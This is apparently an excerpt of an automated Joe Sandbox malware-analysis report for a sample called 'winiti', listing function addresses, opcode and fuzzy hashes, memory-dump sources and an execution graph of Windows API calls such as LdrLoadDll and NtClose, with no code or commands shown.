                      • Opcode ID: 7d265f33e96a0c92e5a1ef9b471aee0d97171c3633d638ac94bf385f6da679d8
                      • Instruction ID: 9d055b144c092e0a98e363a8be144b41adc32994cd9e51b5d3bca38bb5e0a828
                      • Opcode Fuzzy Hash: 7d265f33e96a0c92e5a1ef9b471aee0d97171c3633d638ac94bf385f6da679d8
                      • Instruction Fuzzy Hash: ACE026367005144BC3087BBCFC0996F3BDAEBC9221B248026F802C3388CE388C068BE1
                      Function 00433AF0 Relevance: .0, Instructions: 24COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c0257f7e5509a29f18e3fe71204c8d4dd36ff7cd90a8262928244b272785a8e4
                      • Instruction ID: 04b0b1f153889e748a3dc1c81d12c1dc896a054f0faded3496ea27fc283360af
                      • Opcode Fuzzy Hash: c0257f7e5509a29f18e3fe71204c8d4dd36ff7cd90a8262928244b272785a8e4
                      • Instruction Fuzzy Hash: 33E0867184A248AFC702CFF4AC159DD7FF8AF5620171001DBD405D7222DA380A09C761
                      Function 004395BC Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 08bdc20c5691cd8a2677b5c3641bd9b7ba5d4d887ecfd521b47df6de065406c6
                      • Instruction ID: d81a5a7fba501bd43a248ded206d9a9f6103841d8595f8398bbad7ab8aba723a
                      • Opcode Fuzzy Hash: 08bdc20c5691cd8a2677b5c3641bd9b7ba5d4d887ecfd521b47df6de065406c6
                      • Instruction Fuzzy Hash: 37E0B63484E344EFCB058B60C0485A8BBB8AB0F310F156082D8299B252C3B8984AEA59
                      Function 004347EF Relevance: .0, Instructions: 18COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 012979180f9eeba32d886107536cc5094d859feebd2cb232088d1725a8fa38b2
                      • Instruction ID: 2c065ad29c6b802d7a49f804f8aaafdc9b5e32d278751f2ef91085bb6161bff9
                      • Opcode Fuzzy Hash: 012979180f9eeba32d886107536cc5094d859feebd2cb232088d1725a8fa38b2
                      • Instruction Fuzzy Hash: 2FD05E7025A7C24FC30297A0C8944C4BF70FEB311031A918BC080CB253CA6A488BC711
                      Function 004395DA Relevance: .0, Instructions: 17COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                      • Instruction ID: 0756dfc6e9e1e013993291350c22eaa61cf0920a4927a92589ec82f58ccbf0a1
                      • Opcode Fuzzy Hash: f64d22e3a3abd6cce0daabefc88d85a7c05dec8770ebf356ebfea0e1b5e95c4d
                      • Instruction Fuzzy Hash: 28D0677994E204EBCB06DB61C0449E9B76CBB1E300F21B846982A5B242D6B89C86DE49
                      Function 00433B00 Relevance: .0, Instructions: 14COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e78159777ce13e0f15c201ea4457f214ebf3563eb933779f24a6d132f40b6b68
                      • Instruction ID: 8f43f9fa0edbc702ea1c85b591d36d22dfff624990ef402c539da3f09207d36a
                      • Opcode Fuzzy Hash: e78159777ce13e0f15c201ea4457f214ebf3563eb933779f24a6d132f40b6b68
                      • Instruction Fuzzy Hash: 32D0C97190520CEF9B44EFA8ED0199EBBFDEB45201B1041AADA09D3220EE315E149B91
                      Function 0043B3A1 Relevance: .0, Instructions: 11COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3d5dee1332047173d715896d27c914a3951ef6a99357101fdec5f570f4ab4d63
                      • Instruction ID: f74cd2e73f9fe3e7ece4833425f84c921284110438a84b1652d6cfebe211aa76
                      • Opcode Fuzzy Hash: 3d5dee1332047173d715896d27c914a3951ef6a99357101fdec5f570f4ab4d63
                      • Instruction Fuzzy Hash: 8FC080B1A85340CFC3438F508CA05C07FF07E9312130900CBC45546093D71D5D1DC750
                      Function 0043D220 Relevance: .0, Instructions: 10COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c2625bac11ceae9f9526052817cb678c50f8ba673d6b5e6d19a17686f936bd93
                      • Instruction ID: 801e925fbac1171acaabcf0ef0a314bc369a2dcfadae98799bd43767f7a9a761
                      • Opcode Fuzzy Hash: c2625bac11ceae9f9526052817cb678c50f8ba673d6b5e6d19a17686f936bd93
                      • Instruction Fuzzy Hash: D2C02B304003488FD30D2B98FD8D32E7B5CB715703F000021D1CC058304B70448CD676
                      Function 00438681 Relevance: .0, Instructions: 9COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4568a59001157f118bbbeec53a5f0541e1fa7e9456d2bddc993a4365705abf41
                      • Instruction ID: b089a04426442ce821f18832a69ef7c7eec90dc360d30b8310de8c77ed1a6980
                      • Opcode Fuzzy Hash: 4568a59001157f118bbbeec53a5f0541e1fa7e9456d2bddc993a4365705abf41
                      • Instruction Fuzzy Hash: 93C012A220A2C05FC3068B2488A0890BF217EA200830A44CAE0998B0A3CA01AA26C305
                      Function 00438F8F Relevance: .0, Instructions: 9COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3359189f629b7cd7bf84ccc783295553b2cf806eb13b177095b5a38ad57d322f
                      • Instruction ID: c0d88379de615ff246bf9793ccb26c1850b9a6f19ca674ed76ef6ff964077b87
                      • Opcode Fuzzy Hash: 3359189f629b7cd7bf84ccc783295553b2cf806eb13b177095b5a38ad57d322f
                      • Instruction Fuzzy Hash: 37C0023491D384CFC7258B60D8945ACBB75AB1E341F34605FA06697252CB245806EF1A
                      Function 00438F1E Relevance: .0, Instructions: 7COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 15af3ece82aaf170832c354c1119fced4771343e284a5ca21dc76a4cc31cb423
                      • Instruction ID: 9ba41ae901a02456a18222073afa640ba0a4a50d6579717deb370faf53f7dfe3
                      • Opcode Fuzzy Hash: 15af3ece82aaf170832c354c1119fced4771343e284a5ca21dc76a4cc31cb423
                      • Instruction Fuzzy Hash: 2BC04C34D18204CFC7248B60D4945ACB775AB0D341F30501E906657112C7345806EF59

                      Non-executed Functions

                      Function 00433B38 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000008.00000002.450767758.0000000000430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00430000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_430000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID: 4'p
                      • API String ID: 0-481844870
                      • Opcode ID: 4ff67776baf016029f82c9395fbd62dc48bcfae4d15bb114fec9e3bc65a52bb7
                      • Instruction ID: b16a5e7150ce3da2fe22afe4f63af003a96a65a366abc4b244385fd5b18ce01f
                      • Opcode Fuzzy Hash: 4ff67776baf016029f82c9395fbd62dc48bcfae4d15bb114fec9e3bc65a52bb7
                      • Instruction Fuzzy Hash: 90515D71E116088FE709EF7EE855B8E7BE3AFC8304F58C569C0049B269EF3859058B95
                      Function 01E82220 Relevance: .3, Instructions: 319COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 81d6f962d85bdc70bf8e3478139306040a2c6178d22e2b0b5f71c2cbf2a54d12
                      • Instruction ID: b498c9837956ddbaea3dc2c6ee6cde00573a2f94fbc8a0fa179964e56c124fb5
                      • Opcode Fuzzy Hash: 81d6f962d85bdc70bf8e3478139306040a2c6178d22e2b0b5f71c2cbf2a54d12
                      • Instruction Fuzzy Hash: E2E13C74E002598FCB14DFACC5909ADFBB2BF89305F248169D919AB35AC7319D42CFA0
                      Function 01E819B1 Relevance: .3, Instructions: 318COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3553d5cad36720ba03841fdad956e1d97cba914afddd1b26b1258b689771cfdf
                      • Instruction ID: 6e43a44464463009915626f8c9ceb922feeb2f9d5ee83b299f5796893e378993
                      • Opcode Fuzzy Hash: 3553d5cad36720ba03841fdad956e1d97cba914afddd1b26b1258b689771cfdf
                      • Instruction Fuzzy Hash: 81E12B74E002598FCB14DFA9D580AADFBF2BF89305F248169D819AB356D7319D42CF60
                      Function 01E81DE8 Relevance: .3, Instructions: 315COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9efd9fc8441d1c3972c298cfc32eb3029325cf0d2d6aa5b4436f5e613ce75658
                      • Instruction ID: f98ca237d71ec16e31357d8903e5cbd4ff6b57a7cb436acdc12081a5e700525c
                      • Opcode Fuzzy Hash: 9efd9fc8441d1c3972c298cfc32eb3029325cf0d2d6aa5b4436f5e613ce75658
                      • Instruction Fuzzy Hash: 52E11B74E001598FCB14DFA9C5809ADFBF2BF89305F248169E919AB356C731AD42CFA0
                      Function 01E82B50 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9f41bcbb40351e86bd83d46ef806977801d7cdf28f89dbdddb0534cb8e0c44a8
                      • Instruction ID: 01ff42a3027695d018186520176c7bdcb190f4ccc43b59de6a968a7b5e02df9b
                      • Opcode Fuzzy Hash: 9f41bcbb40351e86bd83d46ef806977801d7cdf28f89dbdddb0534cb8e0c44a8
                      • Instruction Fuzzy Hash: 59E12C74E002598FCB14DFA9C5809ADFBB2FF89305F248159E919A735AD731AD41CFA0
                      Function 01E82718 Relevance: .3, Instructions: 312COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 477ad36ba4ec9b0f8bf5b1ae4066a808563d3b4b98300589a3f665ccd57bdccb
                      • Instruction ID: 9b11706cd6166cf0758904a62c5ad3b6d70ec2ca5fe59f9c2d640df57b6e3cbc
                      • Opcode Fuzzy Hash: 477ad36ba4ec9b0f8bf5b1ae4066a808563d3b4b98300589a3f665ccd57bdccb
                      • Instruction Fuzzy Hash: 03E10A74E002598FCB14DFA9D5809ADFBF2BF88305F248169E919AB35AD7319D41CFA0
                      Function 01E82709 Relevance: .1, Instructions: 132COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c026578f38b061128e9c447bce8ae8d49f16078bebf4f0d735871eea101b67b7
                      • Instruction ID: 62c4a8a26b99fd1726e89407471f20c03de7ca3e4b6aa325c0e0da8b62b00e7e
                      • Opcode Fuzzy Hash: c026578f38b061128e9c447bce8ae8d49f16078bebf4f0d735871eea101b67b7
                      • Instruction Fuzzy Hash: 28515B74E102598FDB14DFA9C5805AEFBF2BF89304F24C16AD508AB356D7319942CFA1
                      Function 01E82B40 Relevance: .1, Instructions: 130COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2539771b1740eacf507b55d1a902db87f3615493b2515b0367087a35f0412836
                      • Instruction ID: 01cb704673a057c465c1751c1bf0bedf41d80ac9594064526d2d82c9639aa76d
                      • Opcode Fuzzy Hash: 2539771b1740eacf507b55d1a902db87f3615493b2515b0367087a35f0412836
                      • Instruction Fuzzy Hash: 5D512A74E002598FDB18DFA9C9805AEFBF2BF89305F24C16AD508A7256D7319942CFA0
                      Function 01E819C0 Relevance: .1, Instructions: 127COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f90530dfcc0a5ae9c1fb469ac58b5589620678e974f42afbcd0613c4f0f7e36d
                      • Instruction ID: 5a959095c07ecc074dd8021764d8a8e7a4986304c285535ba94686c7407994fd
                      • Opcode Fuzzy Hash: f90530dfcc0a5ae9c1fb469ac58b5589620678e974f42afbcd0613c4f0f7e36d
                      • Instruction Fuzzy Hash: C9510974E002198FDB14DFA9D9805AEFBF2BF89305F24C16AD419A7356D7319942CFA0
                      Function 01E82230 Relevance: .1, Instructions: 127COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000008.00000002.450875437.0000000001E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 01E80000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_8_2_1e80000_winiti.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 82a2a5653cf91d158f771c4db03b7e3aca29d15528267d1d9f4ff28f41133d22
                      • Instruction ID: f727e69f011391b844384310e096f9aff23698686f04befa51fe598d0aea166f
                      • Opcode Fuzzy Hash: 82a2a5653cf91d158f771c4db03b7e3aca29d15528267d1d9f4ff28f41133d22
                      • Instruction Fuzzy Hash: 24512A74E0021A8FDB14DFA9C5845AEFBF2BF89304F24C16AD519AB356D7319941CFA0

                      Execution Graph

                      Execution Coverage:0.9%
                      Dynamic/Decrypted Code Coverage:4.1%
                      Signature Coverage:7.2%
                      Total number of Nodes:97
                      Total number of Limit Nodes:8
                      execution_graph 78408 42f0c3 78409 42f0d3 78408->78409 78410 42f0d9 78408->78410 78413 42e0a3 78410->78413 78412 42f0ff 78416 42c213 78413->78416 78415 42e0be 78415->78412 78417 42c22d 78416->78417 78418 42c23e RtlAllocateHeap 78417->78418 78418->78415 78419 424803 78420 42481f 78419->78420 78421 424847 78420->78421 78422 42485b 78420->78422 78423 42bee3 NtClose 78421->78423 78429 42bee3 78422->78429 78425 424850 78423->78425 78426 424864 78432 42e0e3 RtlAllocateHeap 78426->78432 78428 42486f 78430 42befd 78429->78430 78431 42bf0e NtClose 78430->78431 78431->78426 78432->78428 78506 42b4d3 78507 42b4f0 78506->78507 78510 94fdc0 LdrInitializeThunk 78507->78510 78508 42b518 78510->78508 78511 42f1f3 78512 42f163 78511->78512 78513 42e0a3 RtlAllocateHeap 78512->78513 78514 42f1c0 78512->78514 78515 42f19d 78513->78515 78516 42dfc3 RtlFreeHeap 78515->78516 78516->78514 78522 424b93 78523 424bac 78522->78523 78524 424bf7 78523->78524 78527 424c37 78523->78527 78529 424c3c 78523->78529 78525 42dfc3 RtlFreeHeap 78524->78525 78526 424c07 78525->78526 78528 42dfc3 RtlFreeHeap 78527->78528 78528->78529 78530 413ab3 78534 413ad3 78530->78534 78532 413b3c 78533 413b32 78534->78532 78535 41b213 RtlFreeHeap LdrInitializeThunk 78534->78535 78535->78533 78433 401a64 78434 401a80 78433->78434 78434->78434 78437 42f593 78434->78437 78440 42db73 78437->78440 78441 42db99 78440->78441 78450 407313 78441->78450 78443 42dbaf 78449 401b69 78443->78449 78453 41af43 78443->78453 78445 42dbe3 78464 42c2b3 78445->78464 78446 42dbce 78446->78445 78447 42c2b3 ExitProcess 78446->78447 78447->78445 78452 407320 78450->78452 78467 4166d3 78450->78467 78452->78443 78454 41af6f 78453->78454 78489 41ae33 78454->78489 78457 41afb4 78460 41afd0 78457->78460 78462 42bee3 NtClose 78457->78462 78458 41af9c 78459 41afa7 78458->78459 78461 42bee3 NtClose 78458->78461 78459->78446 78460->78446 78461->78459 78463 41afc6 78462->78463 78463->78446 78465 42c2cd 78464->78465 78466 42c2de ExitProcess 78465->78466 78466->78449 78468 4166ed 78467->78468 78470 416706 78468->78470 78471 42c953 78468->78471 78470->78452 78473 42c96d 78471->78473 78472 42c99c 78472->78470 78473->78472 78478 42b523 78473->78478 78479 42b53d 78478->78479 78485 94fae8 LdrInitializeThunk 78479->78485 78480 42b569 78482 42dfc3 78480->78482 78486 42c263 78482->78486 78484 42ca15 78484->78470 78485->78480 78487 42c280 78486->78487 78488 42c291 RtlFreeHeap 78487->78488 78488->78484 78490 41ae4d 78489->78490 78494 41af29 78489->78494 78495 42b5c3 78490->78495 78493 42bee3 NtClose 78493->78494 78494->78457 78494->78458 78496 42b5e0 78495->78496 78499 9507ac LdrInitializeThunk 78496->78499 78497 41af1d 78497->78493 78499->78497 78500 417aa5 78501 417aa2 78500->78501 78502 417a58 78500->78502 78503 417a63 LdrLoadDll 78502->78503 78504 417a7a 78502->78504 78503->78504 78505 94f9f0 LdrInitializeThunk

                      Executed Functions

                      Function 00417A03 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 266 417a03-417a2c call 42ecc3 269 417a32-417a40 call 42f203 266->269 270 417a2e-417a31 266->270 273 417a50-417a61 call 42d663 269->273 274 417a42-417a4d call 42f4a3 269->274 279 417a63-417a77 LdrLoadDll 273->279 280 417a7a-417a7d 273->280 274->273 279->280
                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417A75
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                      • Instruction ID: ee6c7ceef1adf1cf5f0f5272745ac9c454e7c3774a2bd0dbb7ae4b93fd6402ff
                      • Opcode Fuzzy Hash: 901762d70c1facbf16f74a98b42673f6f147b3b8484110a3e016d9ffbcbb916f
                      • Instruction Fuzzy Hash: AF015EB5E4020DABDB10DBE5DC42FDEB7789F14308F4041AAE90897240F635EB488B95
                      Function 0042BEE3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 293 42bee3-42bf1c call 404703 call 42d153 NtClose
                      APIs
                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BF17
                      Memory Dump Source
                      • Source File: 00000009.00000002.522828239.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_400000_winiti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                      • Instruction ID: 506154e8a8f3fb9aa3bbf7faef934b62bf1fce9cdcae224abcf988a766b44963
                      • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                      • Instruction Fuzzy Hash: 60E0DF362002007BC110BB5ADC01F9B739CDBC1714F00401AFA0C67241C674790486E5
                      Function 009507AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                      • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                      • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                      • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                      Function 0094F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 303 94f9f0-94fa05 LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                      Function 0094FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 304 94fae8-94fafd LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_930000_winiti.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                      Function 0094FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 305 94fb68-94fb7d LdrInitializeThunk
                      APIs
                      Memory Dump Source
                      • Source File: 00000009.00000002.522875994.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000009.00000002.522875994.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A20000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A34000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A37000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.522875994.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
